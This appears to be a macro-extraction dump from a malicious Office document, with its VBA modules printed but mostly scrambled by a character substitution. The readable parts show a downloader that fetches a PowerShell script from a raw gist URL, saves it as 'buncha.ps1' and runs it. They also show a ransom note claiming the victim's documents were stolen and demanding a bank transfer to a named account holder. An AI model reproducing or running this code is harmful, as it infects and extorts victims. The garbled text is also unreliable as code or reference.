#NØØÕÄ!7ÖV7s9gRÄÕB7!:ãW?HnÅd@ãnRãÅ7BãnÅRBÕjjVJã,7Åj?ãnRã!VIgn!VJãn9ã?7gãHÕÅBãB7ãgRVãØ^ãeoÄVjC
7jV§sÕãf_cf_Ãã7Åã ?BQ7Åãd_ÃÃ_@ã3ãQBBW://JVÄÕjÕAV_nÅ97/W?BQ7Å/7jVB77jR
===============================================================================
PkNe:ãÖÕÅQU@fRU¥dUÓÃÄQU@fWQU¥dUp@ÅAU@fBQn_ojR
M?WV:ãGNe
3333333333333333333333333333333333333333333333333333333333333333333333333333333
+pÓãØÓ¥ÜGãMQnR¡7!bs77b_ÄjRã
nÅã9njV:ãÖÕÅQU@fRU¥dUÓÃÄQU@fWQU¥dUp@ÅAU@fBQn_ojRã3ãGNeãRB!VÕ0:ã'a+pÓa ÜG¶e¥Ma¥&Ü/+pÓ/MQnR¡7!bs77b'
3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã
,V0WB?ã0ÕÄ!7C
3333333333333333333333333333333333333333333333333333333333333333333333333333333
+pÓãØÓ¥ÜGã^QVVBÃ_ÄjRã
nÅã9njV:ãÖÕÅQU@fRU¥dUÓÃÄQU@fWQU¥dUp@ÅAU@fBQn_ojRã3ãGNeãRB!VÕ0:ã'a+pÓa ÜG¶e¥Ma¥&Ü/+pÓ/^QVVBÃ'
3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã
,V0WB?ã0ÕÄ!7C
3333333333333333333333333333333333333333333333333333333333333333333333333333333
+pÓãØÓ¥ÜGãØ7JgjVÃ_§sÕã
nÅã9njV:ãÖÕÅQU@fRU¥dUÓÃÄQU@fWQU¥dUp@ÅAU@fBQn_ojRã3ãGNeãRB!VÕ0:ã'a+pÓa ÜG¶e¥Ma¥&Ü/+pÓ/Ø7JgjVÃ'
3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã
^gsãÓgB7aGWVÅ,C
¡7!bs77baGWVÅ
eÅJã^gs
^gsãÓgB7GWVÅ,C
¡7!bs77baGWVÅ
eÅJã^gs
^gsã¡7!bs77bGWVÅ,C
¡7!bs77baGWVÅ
eÅJã^gs
^gsãÖ7Äg0VÅBaGWVÅ,C
¡7!bs77baGWVÅ
eÅJã^gs
^gsãÖ7Äg0VÅBGWVÅ,C
¡7!bs77baGWVÅ
eÅJã^gs
PgÅÄBn7Åãªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨,µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨C
¯¨ttu¯©¿¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·ã=ã"ãXL1lYU~Ùä,Ca²ZfÃ@dO-cq³áÕsÄJV9AQnvbj0Å7WI!RBg§Ho?K_F3.Óp¥ÖePâzk¶ÛNØ%G mÜ^M&+¡#4)uÀrt8(ÒSw|T*Â$EåyhiÚx65Dà¿2ÁÔ"
»¢¿¿u®«¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢ã=ã"6#NÃj4&.å5F¥Õr)9S1JG3ÄItÚ$Rw¶+áÓmÅ§svf|q¡kLÜpA2z7XÛaPd_*WÔEV xKb¿y%àUâã0h~ØÙ²ÀlOCg8!B³,T^HZMäÒYeD?QnÁoc-Öiu@(Â"
P7!ã?ã=ãÃãM7ãNVÅ,µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨C
¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ¹¤¾½tÔ¸r¤µ»°°22¹¾©·¬·ª°¸°ÀÔ·µ¬¹u¬¯¨ttu¯©ã=ãkÅ^B!,¯¨ttu¯©¿¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·FãØnJ,µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨Fã?FãÃCC
k9ã¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ¹¤¾½tÔ¸r¤µ»°°22¹¾©·¬·ª°¸°ÀÔ·µ¬¹u¬¯¨ttu¯©ã>ãfãMQVÅ
¿¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«ã=ãØnJ,»¢¿¿u®«¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢Fã¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ¹¤¾½tÔ¸r¤µ»°°22¹¾©·¬·ª°¸°ÀÔ·µ¬¹u¬¯¨ttu¯©FãÃC
¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»ã=ã¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»ã²ã¿¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«
ejRV
¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»ã=ã¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»ã²ãØnJ,µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨Fã?FãÃC
eÅJãk9
%VoB
ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨ã=ã¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»
P7!ãt2½¢º¹¸°¾»´¦2¢·¬»´¦tr¦¦·°¿Ô°¯¾µ·2½µº¦¿»¹rÔ¦Ô·r¢Ôt°2°¹¾¾£½©¼°Ô«ª2À¹¿°ã=ãÃãM7ãNVÅ,®¿®¾ª¼u¢·Ô»°¾£º¤uº·À¦ª¹¹¾´°¢r¿©»°´¢«°µ¸¿Ô¤·«½u¢´¹ºÀº»º¸®µ»t¸µ»¦¦½¨¾¾¨¦rC
®¿®¾ª¼u¢·Ô»°¾£º¤uº·À¦ª¹¹¾´°¢r¿©»°´¢«°µ¸¿Ô¤·«½u¢´¹ºÀº»º¸®µ»t¸µ»¦¦½¨¾¾¨¦rã=ãt2½¢º¹¸°¾»´¦2¢·¬»´¦tr¦¦·°¿Ô°¯¾µ·2½µº¦¿»¹rÔ¦Ô·r¢Ôt°2°¹¾¾£½©¼°Ô«ª2À¹¿°
%VoB
P7!ãÔ½µ©À»À·¤¼¿µ¢¾·½¼¾®¦»»¼¬2ª¦·°¹·t¹¸¤µttÀ¢£2´¤´¹¨´À¾¦¬°¹¦¼Ô°Àt»ã=ã@ãM7ãNVÅ,£©©t¿º©«®®·ºuu°µ·Àº·«½ª¾¢¢µÔ¹¾rª¤°Ô©½®Ôtµ¯¿¹¹´·¹t½rµ£r·¬·ut¤¹´¨¢º2¯r¦C
£©©t¿º©«®®·ºuu°µ·Àº·«½ª¾¢¢µÔ¹¾rª¤°Ô©½®Ôtµ¯¿¹¹´·¹t½rµ£r·¬·ut¤¹´¨¢º2¯r¦ã=ã@
%VoB
P7!ã»´¦¾¨¿¿½»uº©t¬µt°¿¢µ¼r¢°·¸¤¾¨»£¼À»Ô¹¼¤·©©t¹2¾¸¢·¤·¼ºµ£·ã=ãdãM7ãNVÅ,»¿ª¨½©ª¾»¼2µ¨®º¾¢°¦»»¬Ô2»À¬·»Ô¾Ô¤½°·¾¢rtÀ¹¾t¢µ¾·¹«¬¸¼´t£Ô°µ»«½°®¸C
»¿ª¨½©ª¾»¼2µ¨®º¾¢°¦»»¬Ô2»À¬·»Ô¾Ô¤½°·¾¢rtÀ¹¾t¢µ¾·¹«¬¸¼´t£Ô°µ»«½°®¸ã=ã»´¦¾¨¿¿½»uº©t¬µt°¿¢µ¼r¢°·¸¤¾¨»£¼À»Ô¹¼¤·©©t¹2¾¸¢·¤·¼ºµ£·
%VoB
P7!ã¹®µ´¾Ô»tºª´À¹®¿¿®¦·t«¢¢¢¹µ¹½¸¦2Ô2·°°Àµ¼¤u©¦¸£ÔÔ¹¦¿¨¹«©2µÀ´r·°º¢·À¸rµ¤°rt¯£«¿£ã=ãOãM7ãNVÅ,´t®½£¼µ·©À¤¨®ºr2u»r¹£°»¦¾¹rrtÀ¨«¯°»t¸¢»¹r£»´£¬¦º¸¸t¾½¨ÀºÔ¬Ô«¹·2¿¿°¦«¹Ô¤·C
´t®½£¼µ·©À¤¨®ºr2u»r¹£°»¦¾¹rrtÀ¨«¯°»t¸¢»¹r£»´£¬¦º¸¸t¾½¨ÀºÔ¬Ô«¹·2¿¿°¦«¹Ô¤·ã=ã@
%VoB
eÅJãPgÅÄBn7Å
^gsã¡7!bs77baGWVÅ,C
Ön0ã¹·t«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾ÀÔ»»«·¸»µ´¾¼¿»rÔ2©ÔÔ¾u¼urµ°¤r£¹´¿2ãÓRãGsvVÄB
Ön0ã¦Àº¾u°®¹½º°À£uÀ¢t´ºÔ¦r¤°°·Ô®½½À¿«Ô¸¹«©·¬°·®¿£t¬22¹°«µ©¹¢´Ôª¾¾¸»¹©2r·°¢ª¸¢£ÀãÓRã^B!nÅA
Ön0ã¤¸uº«À¬À°µr¢¹¾uÀ¼rÔ¾®¨¿µ»¾«º½¼»ªr¢¾ª¤»¹¬»¾»¸¤µµ°À2¬u2¢Ô2Ô£¿¢Ô©¨ãÓRã^B!nÅA
Ön0ã2»¿¬À¦¹t¾¸¸t££¹´´¸tÔ¦´¢¹Ô··£°ur»º¿°°Ô©r¢°¾ª«°©«®·½½··´®¹°µµ©½½2Ô·°»¢¼¼´À¦À«¹ãÓRã^B!nÅA
Ön0ã¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µãÓRãkÅBVAV!
¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µã=ã¥Q!,-fCã²ã¥Q!,O³Cã²ã¥Q!,O³C
^VBã¹·t«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾ÀÔ»»«·¸»µ´¾¼¿»rÔ2©ÔÔ¾u¼urµ°¤r£¹´¿2ã=ã¥!VÕBVGsvVÄB,"¡^Ä!nWB_^QVjj"C
¦Àº¾u°®¹½º°À£uÀ¢t´ºÔ¦r¤°°·Ô®½½À¿«Ô¸¹«©·¬°·®¿£t¬22¹°«µ©¹¢´Ôª¾¾¸»¹©2r·°¢ª¸¢£Àã=ã¹·t«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾ÀÔ»»«·¸»µ´¾¼¿»rÔ2©ÔÔ¾u¼urµ°¤r£¹´¿2_^WVÄnÕjP7jJV!R,"ÓWWÖÕBÕ"C
Ön0ãÔ·µ¬¹u¬¯¨ttu¯©¿¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼
Ön0ã´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦
Ön0ã¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ¹¤¾½tÔ¸r¤µ»°°22¹¾©·¬·ª°¸°ÀÔ·µ¬¹u¬¯¨ttu¯©¿
Ön0ãt2½¢º¹¸°¾»´¦2¢·¬»´¦tr¦¦·°¿Ô°¯¾µ·2½µº¦¿»¹rÔ¦Ô·r¢Ôt°2°¹¾¾£½©¼°Ô«ª2À¹¿°ãÓRãN7ÅA
Ön0ãÔ½µ©À»À·¤¼¿µ¢¾·½¼¾®¦»»¼¬2ª¦·°¹·t¹¸¤µttÀ¢£2´¤´¹¨´À¾¦¬°¹¦¼Ô°Àt»ãÓRã^B!nÅA
Ön0ãu¨À©2¾Àº·¼½µÀ®¾Ô¼½«¹´ÔÔ¿r°»¤À·»°¬£°uÔ2¬¸©º¢¾Ô·´£¹ÔÀ½¬¸ª´º°»2¬ÔÀ£¢¦»·¿ãÓRãN7ÅA
Ön0ã»¿ª¨½©ª¾»¼2µ¨®º¾¢°¦»»¬Ô2»À¬·»Ô¾Ô¤½°·¾¢rtÀ¹¾t¢µ¾·¹«¬¸¼´t£Ô°µ»«½°®¸ãÓRã^B!nÅA
Ön0ã»´¦¾¨¿¿½»uº©t¬µt°¿¢µ¼r¢°·¸¤¾¨»£¼À»Ô¹¼¤·©©t¹2¾¸¢·¤·¼ºµ£·ãÓRãN7ÅA
Ön0ã¹®µ´¾Ô»tºª´À¹®¿¿®¦·t«¢¢¢¹µ¹½¸¦2Ô2·°°Àµ¼¤u©¦¸£ÔÔ¹¦¿¨¹«©2µÀ´r·°º¢·À¸rµ¤°rt¯£«¿£ãÓRã^B!nÅA
Ön0ã°»»¦À½º®¤¼º¬t¤tº¸¿®¨½®©µ«¢´¾´··¦«º¬º°Ôrª¹«uº¼£º·¦¢¬°¢¾2µr°ãÓRã^B!nÅA
Ön0ã£©©t¿º©«®®·ºuu°µ·Àº·«½ª¾¢¢µÔ¹¾rª¤°Ô©½®Ôtµ¯¿¹¹´·¹t½rµ£r·¬·ut¤¹´¨¢º2¯r¦ãÓRãN7ÅA
Ön0ãt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ¹¤¾½tÔ¸r¤µ»°°22¹¾©·¬·ª°¸°ÀÔ·µ¬¹u¬
Ön0ãrªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ
Ön0ã¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2ÀãÓRãkÅBVAV!
Ön0ãt¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ¹¤¾½tÔ¸r
Ön0ã®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©
¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2Àã=ãÃ
ÜÕÅAV,"ÓÃ"C_+ÕjgVã=ãªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨,"Opening document"C
Ön0ã½¹¢r°½¢¼¬µÔ¨t¹rÀ£½¬u´Ôºµ¢ªÔ°¸¢¿«µ2Ô°°¤µ¸µ¾¦°¹¾Ô¹»»·À¾r°£¬¼·´©·À·©¾t2¦¤·¿¨¹º°¹©2©££»ÔÀ¢¾¤ãÓRã^B!nÅA
´¸®¢»¬«¢®¼u¾«rÀ»¦°´»·°ºÔªÀ½½¤2»´ª2Ô¸»®«¿u¸¿¢tµ¿¾u¼£rÀ¾«¹¿¹2ºµº¦¿¹¦¨¸®¸2¹µt¢£¯©¦¾·º£¼ºr»¨®r¦¤¦·½»¿tã=ã"You have been hacked and your important documents have been stolen!"ãÙã§s¥!N9ãÙã"To retrieve these data, you are required to transfer 100k to the following bank account number: "ãÙã§s¥!N9ãÙã"1010107112000"ãÙã§s¥!N9ãÙã"Account holder: Nguyen Thanh Long"ãÙã§s¥!N9ãÙã"Bank: MB Bank"
½¹¢r°½¢¼¬µÔ¨t¹rÀ£½¬u´Ôºµ¢ªÔ°¸¢¿«µ2Ô°°¤µ¸µ¾¦°¹¾Ô¹»»·À¾r°£¬¼·´©·À·©¾t2¦¤·¿¨¹º°¹©2©££»ÔÀ¢¾¤ã=ãªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨,´¸®¢»¬«¢®¼u¾«rÀ»¦°´»·°ºÔªÀ½½¤2»´ª2Ô¸»®«¿u¸¿¢tµ¿¾u¼£rÀ¾«¹¿¹2ºµº¦¿¹¦¨¸®¸2¹µt¢£¯©¦¾·º£¼ºr»¨®r¦¤¦·½»¿tC
ØRAp7oã½¹¢r°½¢¼¬µÔ¨t¹rÀ£½¬u´Ôºµ¢ªÔ°¸¢¿«µ2Ô°°¤µ¸µ¾¦°¹¾Ô¹»»·À¾r°£¬¼·´©·À·©¾t2¦¤·¿¨¹º°¹©2©££»ÔÀ¢¾¤Fã§skÅ97!0ÕBn7ÅFãªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨,"We deeply regret to inform you"C
Ön0ã¢¿¸Àt·´®¨½ÔÀ¼»´2r¾½º¢u°°¹¹££©´¢©¹ª¬»ÀÀ°º·«¿r¦¾r¦¹º¤¹¼»«»¬º¤¸½Ô¹¬r2¿°¾·»2©ÔªãÓRãÖÕBV
Ön0ã¹»«´¾¹Àº¸u°·¿Ôµ¢µ¾r¦Ô2¿¨´r½°·£®·»ªÀ¬¬»½µt©·»¾¤·¹¤µ®º¤¸2¿·¢·¹º££2¬¸ãÓRãÖÕBV
¢¿¸Àt·´®¨½ÔÀ¼»´2r¾½º¢u°°¹¹££©´¢©¹ª¬»ÀÀ°º·«¿r¦¾r¦¹º¤¹¼»«»¬º¤¸½Ô¹¬r2¿°¾·»2©Ôªã=ãÖÕBV
¹»«´¾¹Àº¸u°·¿Ôµ¢µ¾r¦Ô2¿¨´r½°·£®·»ªÀ¬¬»½µt©·»¾¤·¹¤µ®º¤¸2¿·¢·¹º££2¬¸ã=ãÖÕBV^V!nÕj,@f@dFãcFãcC
k9ã¢¿¸Àt·´®¨½ÔÀ¼»´2r¾½º¢u°°¹¹££©´¢©¹ª¬»ÀÀ°º·«¿r¦¾r¦¹º¤¹¼»«»¬º¤¸½Ô¹¬r2¿°¾·»2©Ôªã<ã¹»«´¾¹Àº¸u°·¿Ôµ¢µ¾r¦Ô2¿¨´r½°·£®·»ªÀ¬¬»½µt©·»¾¤·¹¤µ®º¤¸2¿·¢·¹º££2¬¸ãMQVÅ
^VBãt¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ¹¤¾½tÔ¸rã=ã¥!VÕBVGsvVÄB,"0nÄ!7R79B_o0jQBBW"C
^VBãrªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔã=ã¥!VÕBVGsvVÄB,"^QVjj_ÓWWjnÄÕBn7Å"C
t°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ¹¤¾½tÔ¸r¤µ»°°22¹¾©·¬·ª°¸°ÀÔ·µ¬¹u¬ã=ã¦Àº¾u°®¹½º°À£uÀ¢t´ºÔ¦r¤°°·Ô®½½À¿«Ô¸¹«©·¬°·®¿£t¬22¹°«µ©¹¢´Ôª¾¾¸»¹©2r·°¢ª¸¢£Àã²ãªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨,"\buncha.ps1"C
t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ¹¤¾½tÔ¸r_GWVÅã"AVB"Fãªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨,"https://gist.githubusercontent.com/bquanman/98da73d49faec0cbbdab02d4fd84adaa/raw/8de8b90981e667652b1a16f5caed364fdc311b77/a80sc012.ps1"CFãPÕjRV
t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ¹¤¾½tÔ¸r_RVÅJ
´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦ã=ãt¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ¹¤¾½tÔ¸r_!VRW7ÅRVp7J?
k9ãt¯½°rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ¹¤¾½tÔ¸r_^BÕBgRã=ã@ffãMQVÅ
^VBãÔ·µ¬¹u¬¯¨ttu¯©¿¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼ã=ã¥!VÕBVGsvVÄB,"ÕJ7Js_RB!VÕ0"C
Ô·µ¬¹u¬¯¨ttu¯©¿¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼_GWVÅ
Ô·µ¬¹u¬¯¨ttu¯©¿¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼_M?WVã=ã¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2À
Ô·µ¬¹u¬¯¨ttu¯©¿¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼_¡!nBVã´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨µ£t¯½°rªrµº´©¤£¤À½¯ª¸¯u¦
